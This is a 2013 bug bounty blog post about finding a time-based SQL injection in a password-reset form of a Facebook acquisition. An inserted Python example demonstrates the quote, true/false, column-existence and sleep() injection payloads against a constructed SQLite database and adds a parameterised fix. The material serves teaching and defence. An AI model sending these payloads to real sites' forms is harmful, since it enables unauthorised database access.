Wednesday, June 19, 2013

Facebook Bug Bounty - Time Based SQLi in FB's Acquisition

I'm back.
In my previous post I talked about how long FB's security team takes to reply to you for your first reward (in my case, almost a month).

Here's the POC for my finding.
Oh, by the way, I'll censor the URL. Why? I'm quite sure there are still more bugs in this acquisition. So, for a real bug hunter, with these images, they'll know how to find the real site :D Good luck!

Time Based SQLi in FB's Acquisition

I checked out their forgot password form. By testing with a single quote (') a weird but well-known error appeared. Yes, a SQL error.

Hmm.. let's try to close the quote.


Now let's try to give some POC. Use a simple test with the 1 or 1=1 thingy.

Hmm, unknown error? So this is the TRUE/FALSE response.

Hah! A different error. This might be its FALSE/TRUE response then.

I'm on the right track! But it's still not enough for a POC!

Try to figure out a valid column? Let's try the same thing I used for my PayPal bounty.

Testing to check if xxxxx is a valid column.. NO!

Testing if user is a valid column.. YEAH!!!

Final touch-up.. let's try with time-based testing!
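The probing sequence above, as an added example that is not code from the original post or from the affected site: a constructed SQLite database stands in for the acquisition's forgot-password lookup (the `accounts` table, its `user` and `email` columns, and the registered `sleep()` function are assumptions, since the real schema is unknown). It runs the single-quote error, the `1=1` / `1=2` true/false responses, the column-existence check and the time-based confirmation against a query that concatenates input, next to the parameterised query that stops all of them.

```python
"""Added example, not the original post's code or the target site's code.

A constructed SQLite database stands in for the "forgot password" lookup.
The table, column names and the sleep() helper are assumptions for
illustration; the real target's schema and DBMS are not known.
"""
import sqlite3
import time


def make_db():
    """Constructed sample database: two accounts, plus a sleep() function."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, user TEXT, email TEXT)")
    conn.executemany("INSERT INTO accounts (user, email) VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    # SQLite has no SLEEP(); register one so a time-based payload can be shown.
    # Returns 0 so it never makes the WHERE clause true, it only burns time.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return conn


def forgot_password_vulnerable(conn, email):
    # Vulnerable: attacker-controlled input concatenated straight into the SQL.
    sql = "SELECT user FROM accounts WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def forgot_password_fixed(conn, email):
    # Fixed: parameterised query; the input is bound as data, never parsed as SQL.
    rows = conn.execute("SELECT user FROM accounts WHERE email = ?", (email,))
    return [row[0] for row in rows]


def probe(conn, payload):
    """Send one payload to the vulnerable form.

    Returns (status, detail, elapsed_seconds) where status is "ok" with the
    rows returned, or "error" with the database error message, the two
    responses the post distinguishes.
    """
    start = time.monotonic()
    try:
        rows = forgot_password_vulnerable(conn, payload)
        return "ok", rows, time.monotonic() - start
    except sqlite3.Error as exc:
        return "error", str(exc), time.monotonic() - start


def column_exists(conn, column):
    """Column-existence check: a reference to an unknown column is a
    database error, a known column lets the query run normally."""
    status, _, _ = probe(conn, "x' AND " + column + " IS NOT NULL -- ")
    return status == "ok"


def injection_delays(conn, seconds=0.3):
    """Time-based confirmation: the response is only delayed if the
    injected sleep() actually executes inside the query."""
    _, _, elapsed = probe(conn, "x' OR sleep(%g) -- " % seconds)
    return elapsed >= seconds


if __name__ == "__main__":
    db = make_db()
    print("single quote      ->", probe(db, "'")[:2])
    print("x' OR 1=1 --      ->", probe(db, "x' OR 1=1 -- ")[:2])
    print("x' OR 1=2 --      ->", probe(db, "x' OR 1=2 -- ")[:2])
    print("column xxxxx      ->", column_exists(db, "xxxxx"))
    print("column user       ->", column_exists(db, "user"))
    print("sleep() delays    ->", injection_delays(db))
    print("fixed form, 1=1   ->", forgot_password_fixed(db, "x' OR 1=1 -- "))
```

The time-based check is the one that survives when error messages are suppressed and true/false responses look identical, which is why it is the final confirmation; on a real target, repeat it with two different delays so that network jitter is not mistaken for injection.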

Finally.. my bug was accepted by Facebook and will join FB's whitepage. Mission accomplished and..